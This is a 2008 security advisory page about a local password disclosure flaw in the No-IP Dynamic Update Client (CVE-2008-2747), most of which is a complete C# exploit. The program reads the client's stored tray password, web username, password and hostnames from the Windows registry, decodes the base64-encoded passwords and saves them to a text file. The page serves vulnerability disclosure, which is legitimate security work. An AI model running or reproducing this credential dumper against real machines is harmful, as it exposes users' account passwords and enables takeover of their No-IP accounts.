|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | DUC NO-IP Local Password Information Disclosure Vulnerability
|
SecurityAlert : 3952
CVE : CVE-2008-2747
CWE : CWE-264
SecurityRisk : Low (About)
Remote Exploit : No
Local Exploit : Yes
Victim interaction required : No
Exploit Available : Yes
Credit : Charalambous Glafkos
Published : 22.06.2008
Affected Software : | No-ip, Dynamic_update_client, 2.2.1 |
 Advisory Content : /*
* DUC NO-IP Local Password Information Disclosure
* Author(s): Charalambous Glafkos
* George Nicolaou
* Date: March 11, 2008
* Site: http://www.astalavista.com
* Mail: glafkos (at) astalavista (dot) com [email concealed]
* ishtus (at) astalavista (dot) com [email concealed]
*
* Synopsis: DUC NO-IP is prone to an information disclosure vulnerability
due to a design error.
* Attackers can exploit this issue to obtain sensitive
information including tray password,
* web username, password and hostnames that may lead to further
attacks.
*
* Note: Vendor has been notified long time ago confirming a design error.
* Vendor site: http://www.no-ip.com
*
*/
using System;
using System.Text;
using System.IO;
using Microsoft.Win32;
namespace getRegistryValue
{
class getValue
{
static void Main()
{
getValue details = new getValue();
String strDUC = details.getDUC();
Console.WriteLine("\nDUC NO-IP Password Decoder v1.2");
Console.WriteLine("Author: Charalambous Glafkos");
Console.WriteLine("Bugs: glafkos (at) astalavista (dot) com [email
concealed]");
Console.WriteLine(strDUC);
FileInfo t = new FileInfo("no-ip.txt");
StreamWriter Tex = t.CreateText();
Tex.WriteLine(strDUC);
Tex.Write(Tex.NewLine);
Tex.Close();
Console.WriteLine("\nThe file named no-ip.txt is created\n");
}
private string getDUC()
{
RegistryKey ducKey = Registry.LocalMachine;
ducKey = ducKey.OpenSubKey(@"SOFTWARE\Vitalwerks\DUC", false);
String TrayPassword =
DecodeBytes(ducKey.GetValue("TrayPassword").ToString());
String Username = ducKey.GetValue("Username").ToString();
String Password = DecodeBytes(ducKey.GetValue("Password").ToString());
String Hostnames = ducKey.GetValue("Hosts").ToString();
String strDUC = "\nTrayPassword: " + TrayPassword
+ "\nUsername: " + Username
+ "\nPassword: " + Password
+ "\nHostnames: " + Hostnames;
return strDUC;
}
public static string DecodeBytes(String encryptedData)
{
Byte[] toDecodeByte = Convert.FromBase64String(encryptedData);
System.Text.UTF8Encoding encoder = new System.Text.UTF8Encoding();
System.Text.Decoder utf8Decode = encoder.GetDecoder();
int charCount = utf8Decode.GetCharCount(toDecodeByte, 0,
toDecodeByte.Length);
Char[] decodedChar = new char[charCount];
utf8Decode.GetChars(toDecodeByte, 0, toDecodeByte.Length, decodedChar, 0);
String result = new String(decodedChar);
return (new string(decodedChar));
}
}
}
References :
http://www.securityfocus.com/bid/29758
http://www.securityfocus.com/archive/1/archive/1/493367/100/0/threaded
http://secunia.com/advisories/30714
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|